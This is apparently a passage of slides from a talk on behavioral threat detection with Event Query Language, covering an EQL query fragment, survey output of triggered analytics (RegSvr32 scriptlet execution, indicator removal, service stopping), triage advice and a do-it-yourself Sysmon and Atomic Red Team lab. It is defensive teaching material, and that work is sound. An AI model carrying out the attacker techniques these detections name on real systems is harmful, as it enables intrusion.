  [network where subtype.outgoing]
    by unique_pid
  [process where subtype.create]
    by unique_ppid
'''
80. Survey Says
$ eqllib survey -f mydata.json.gz -c
====================================================================
count  analytic_name
====================================================================
    1  Installation of Browser Extensions
    1  Process Discovery
    1  RegSvr32 Scriptlet Execution
    1  Suspicious Script Object Execution
    1  System Owner and User Discovery
    2  Creation of Scheduled Task
    2  Network Service Scanning via Port Scanning
    2  Windows Discovery of Network Environment via Built-in Tools
    3  Execution of Existing Service via Command
    3  InstallUtil Process
    6  Control Panel Items
    6  Indicator Removal on Host
    6  Stop Services with sc.exe
   12  Windows System Information Discovery
81. Identifying True Positives
● Build a baseline of your environment
● What do you find multiple times?
○ Track repeat offenders
○ Both installutil.exe and dbgsrv.exe
triggered multiple detections
Does it tell a story?
82. Pitfalls of Behavioral Detection
● False positives from administrators and background software
○ Watch your ratio of false to true positives
● Lack of context to improve detections
○ True positives rarely occur in isolation
● Waiting for a red team to test posture
● Knee-jerk reactions to trending malware
84. DIY Red & Blue team
● Install and configure Microsoft Sysmon on a Windows endpoint
● Detonate an Atomic Test to generate events
● Collect events as a JSON file using PowerShell
● Install Python then download EQL: pip install eql
● Load the EQL shell with the command: eql
● Load your data file within the shell: input -f my_sysmon_logs.json
85. Conclusion
● Understand what data sources you have
● Focus on commonly seen behaviors
● Practice on small known sets then scale up
● Test early, test often
● Know your resources
● Share with the community!
86. Resources
● MITRE ATT&CK
attack.mitre.org
● Atomic Red Team
atomicredteam.io
● Event Query Language
eql.readthedocs.io
● EQL Analytics Library
eqllib.readthedocs.io
bit.ly/fantastic19
87. Thank You
A number of people helped us along the way.
Paul Ewing
Devon Kerr
Mike Haag
Adam Shostack - BlackHat Speaker Coach